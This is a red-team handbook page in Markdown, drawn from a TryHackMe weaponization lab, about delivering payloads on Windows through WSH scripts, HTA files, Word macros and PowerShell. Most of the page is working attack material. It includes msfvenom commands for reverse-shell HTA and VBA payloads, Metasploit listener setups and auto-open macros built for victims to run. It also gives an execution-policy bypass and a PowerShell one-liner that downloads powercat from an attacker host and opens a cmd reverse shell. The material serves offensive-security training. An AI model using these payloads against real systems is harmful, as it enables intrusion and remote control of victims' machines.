handbook/tools/4.Exploitation/Shell-and-Reverse-Shell/1.Payloads-Windows-and-Linux/Windows/Macros Payloads (MS World, Excel, ...).md

158 lines
7.9 KiB
Markdown
Raw Permalink Normal View History

2024-08-30 23:07:22 +00:00
## Why using Macros Payload?
As security measures become more robust in organizations, executing payloads within controlled environments becomes increasingly challenging for red teamers. Since **.exe** files are often blocked or monitored, alternative techniques such as built-in windows scripting technologies are used. In this context, this task delves into some of the popular and effective scripting techniques, including WSH, HTA, VBA, and PSH, used by red teamers to execute payloads.
- Bypassing .exe Monitoring using WSH, HTA, VBA, PSH
## Windows Scripting Host (WSH)
It is a Windows native engine, cscript.exe (for command-line scripts) and wscript.exe (for UI scripts), which are responsible for executing various Microsoft Visual Basic Scripts (VBScript), including vbs and vbe. For more information about VBScript, please visit [here](https://en.wikipedia.org/wiki/VBScript). It is important to note that the VBScript engine on a Windows operating system runs and executes applications with the same level of access and permission as a regular user; therefore, it is useful for the red teamers.
**Create the code in the vbs or txt file**
- Specify the location of the executable we want to launch
```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
```
- Exeptions (Some apps are in the default path, so no need to provide the initial executable location.)
```
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run "cmd.exe"
```
**Launch the file**
```shell-session
# Launch the vbs script from vbs file
c:\Windows\System32>wscript c:\Users\thm\Desktop\payload.vbs
c:\Windows\System32>cscript.exe c:\Users\thm\Desktop\payload.vbs
# Launch the vbs script from a .txt file
c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
```
More information about VBSscript here ---> https://en.wikipedia.org/wiki/VBScript
## An HTML Application (HTA)
HTA stands for “HTML Application.” It allows you to create a downloadable file that takes all the information regarding how it is displayed and rendered. HTML Applications, also known as HTAs, which are dynamic HTML pages containing JScript and VBScript. The LOLBINS (Living-of-the-land Binaries) tool mshta is used to execute HTA files. It can be executed by itself or automatically from Internet Explorer.
**Reverse Shell**
MSFvenom -> Using hta (HTML)
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f hta-psh -o exploit.hta
```
- Let the victime open the following exploit.hta from Microsoft Edge (This will automaticly run the HTML/HTA element and give back a reverse shell)
- More infromation ---> <a href="https://tryhackme.com/room/weaponization">Tryhackme Module</a> (Seciton An HTML Application - HTA)
Metasploit -> Using hta (HTML)
```
use exploit/windows/misc/hta_server
set LHOST IP
set LPORT 1234
set SRVHOST SAME-IP
set payload windows/meterpreter/reverse_tcp
exploit
```
- Let the victime open the following exploit.hta from Microsoft Edge (This will automaticly run the HTML/HTA element and give back a reverse shell) --> Using python server for example
- More infromation ---> <a href="https://tryhackme.com/room/weaponization">Tryhackme Module</a> (Seciton An HTML Application - HTA)
## Visual Basic for Application (VBA) - Macros
VBA stands for Visual Basic for Applications, a programming language by Microsoft implemented for Microsoft applications such as Microsoft Word, Excel, PowerPoint, etc. VBA programming allows automating tasks of nearly every keyboard and mouse interaction between a user and Microsoft Office applications. 
Macros are Microsoft Office applications that contain embedded code written in a programming language known as Visual Basic for Applications (VBA). It is used to create custom functions to speed up manual tasks by creating automated processes. One of VBA's features is accessing the Windows Application Programming Interface ([API](https://en.wikipedia.org/wiki/Windows_API)) and other low-level functionality. For more information about VBA, visit [here](https://en.wikipedia.org/wiki/Visual_Basic_for_Applications).
- Create/Run Macros (Microsoft Word)
First, we need to open the Visual Basic Editor by selecting view  macros. The Macros window shows to create our own macro within the document.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5d617515c8cd8348d0b4e68f/room-content/5e12755e9b891865c6ef07e25047060b.png)
- Select a name, change the Macros in for "Document1" and click create
Finally, run the macro by F5 or Run  Run Sub/UserForm.
```VBA
Sub Document_Open()
HACKING
End Sub
Sub AutoOpen()
HACKING
End Sub
Sub HACKING()
MsgBox ("You got Hack!")
End Sub
```
It is important to note that to make the macro work, we need to save it in Macro-Enabled format such as .doc and docm. Now let's save the file as Word 97-2003 Template where the Macro is enabled by going to File  save Document1 and save as type → Word 97-2003 Document and finally, save.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5d617515c8cd8348d0b4e68f/room-content/a5e35b7436173da709dae5695c34d4f9.png)
Let's close the Word document that we saved. If we reopen the document file, Microsoft Word will show a security message indicating that Macros have been disabled and give us the option to enable it. Once enable the payload will be executed
- Second Example with calc.exe
```javascript
Sub PoC()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
```
- To explain the code in detail, with Dim payload As String, we declare payload variable as a string using Dim keyword. With payload = "calc.exe" we are specifying the payload name and finally with CreateObject("Wscript.Shell").Run payload we create a Windows Scripting Host (WSH) object and run the payload. Note that if you want to rename the function name, then you must include the function name in the  AutoOpen() and Document_open() functions too.
**It is important to mention that we can combine VBAs with previously covered methods, such as HTAs and WSH. VBAs/macros by themselves do not inherently bypass any detections.**
**HTA Reverse Connection (Using Miscrosoft Word Macros)**
MSFvenom
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=1234 -f vba
```
- Insert the output in the Macros
- Change Workbook_Open() to Document_Open() ---> Workbook_Open() is for excel sheet
Setup Meterpreter reverse shell
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 1234
exploit
```
- Now wait for the target to open the document
- More infromation ---> <a href="https://tryhackme.com/room/weaponization">Tryhackme Module</a> (Visual Basic for Application - VBA)
## PowerShell (PSH)
PowerShell is an object-oriented programming language executed from the Dynamic Language Runtime (DLR) in .NET with some exceptions for legacy uses. Check out the TryHackMe room, [Hacking with PowerShell for more information about PowerShell](https://tryhackme.com/room/powershell).
Bypass policy (Help run powershell script)
```
Get-ExecutionPolicy ---> Check Policy
powershell -ex bypass
powershell -ex bypass -File something.ps1
```
Reverse shell using powercar
```
git clone https://github.com/besimorhino/powercat.git
```
- Open a python server (No need to download it on the target machine since "Launch Powercat" command will do it automaticly)
Launch Netcat
```
nc -lvp 1337
```
Launch Powercat (target)
```
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"
```
- More infromation ---> <a href="https://tryhackme.com/room/weaponization">Tryhackme Module</a> (PowerShell - PSH)